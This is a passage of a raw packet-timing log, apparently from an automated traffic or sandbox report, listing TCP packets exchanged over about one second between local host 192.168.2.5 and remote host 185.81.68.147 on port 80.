                                                                                                                                                                Dec 13, 2024 01:37:11.861690044 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.861763954 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.862446070 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.862580061 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.862656116 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.863342047 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.863466024 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.863543034 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.864262104 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.864372015 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.864463091 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.865183115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.865286112 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.865366936 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.866100073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.866214037 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.866290092 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.866992950 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.867136955 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.867218018 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.867939949 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.868027925 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.868104935 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.868798018 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.868917942 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.868994951 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.869714022 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.869821072 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.869899988 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.870608091 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.870744944 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.870821953 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.871543884 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.871664047 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.871742964 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.872447014 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.872558117 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.872637033 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.873359919 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.873485088 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.873558044 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.874294043 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.874381065 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.874459028 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.875188112 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.875305891 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.875377893 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.876097918 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.876194000 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.876280069 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.876996994 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.877111912 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.877188921 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.877912998 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.878001928 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.878078938 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.878824949 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.878933907 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.879008055 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.879724979 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.879848957 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.880018950 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.880623102 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.880747080 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.880822897 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.881560087 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.881685972 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.881759882 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.882456064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.882580996 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.882661104 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.883362055 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.883477926 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.883553982 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:11.884232998 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:11.926568031 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.028429031 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.028453112 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.028650045 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.028796911 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.028865099 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.028948069 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.029700041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.029827118 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.029905081 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.030616045 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.030742884 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.030816078 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.031555891 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.031733036 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.031805038 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.032426119 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.032546997 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.032618999 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.033360958 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.033483982 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.033557892 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.034245968 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.034317970 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.034389973 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.035178900 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.035285950 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.035358906 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.036060095 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.036190987 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.036261082 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.036978006 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.037110090 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.037185907 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.037878036 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.038003922 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.038075924 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.038801908 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.038918018 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.038991928 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.039751053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.039860964 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.039935112 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.040596962 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.040750027 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.040822983 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.041542053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.041579008 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.041651011 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.042458057 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.042532921 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.042606115 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.043433905 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.043546915 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.043621063 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.044258118 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.044378996 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.044452906 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.045237064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.045315027 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.045387983 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.046164989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.046261072 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.046331882 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.047019005 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.047128916 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.047204018 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.047921896 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.048048973 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.048120975 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.048832893 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.048964024 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.049038887 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.049768925 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.049896955 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.049968958 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.050626040 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.050746918 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.050820112 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.051538944 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.051723957 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.051805019 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.052453041 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.052572012 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.052647114 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.053371906 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.053472042 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.053544998 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.054276943 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.054409981 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.054482937 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.055197001 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.055310965 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.055394888 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.056082964 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.056226015 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.056303978 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.057018042 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.057106018 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.057184935 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.057893038 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.058005095 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.058082104 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.058813095 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.058943033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.059020996 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.059717894 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.059823036 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.059900045 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.060630083 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.060745001 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.060820103 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.061937094 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.062033892 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.062114000 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.062522888 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.062657118 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.062731981 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.063386917 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.063494921 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.063575983 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.064275026 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.064347029 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.064424038 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.065191984 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.065313101 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.065392017 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.066083908 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.066212893 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.066291094 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.067017078 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.067127943 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.067300081 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.067919016 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.067980051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.068053007 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.068839073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.068973064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.069046021 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.069715977 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.069850922 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.069921970 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.070655107 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.070785046 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.070854902 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.071551085 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.071700096 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.071770906 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.072479963 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.072592974 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.072664976 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.073374033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.073493958 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.073568106 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.074273109 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.074393034 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.074464083 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.075201988 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.075320005 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.075393915 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.076073885 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.129664898 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.220313072 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.220396042 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.220474005 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.220696926 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.220841885 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.220911980 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.221673965 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.221774101 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.221844912 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.222523928 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.222611904 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.222680092 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.223423004 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.223543882 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.223613977 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.224428892 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.224596977 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.224670887 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.225243092 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.225353956 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.225425005 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.226166010 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.226274967 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.226345062 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.227055073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.227170944 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.227240086 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.227972984 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.228075981 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.228147984 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.228914022 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.228940010 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.229015112 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.229789972 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.229888916 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.229959011 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.230735064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.230834961 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.230904102 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.231615067 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.231722116 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.231792927 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.232523918 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.232647896 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.232721090 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.233422995 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.233553886 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.233623981 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.234347105 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.234440088 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.234535933 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.235249996 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.235363007 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.235434055 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.236175060 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.236293077 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.236365080 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.237070084 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.237184048 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.237257004 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:12.237972021 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.238101006 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:12.238174915 CET4970780192.168.2.5185.81.68.147
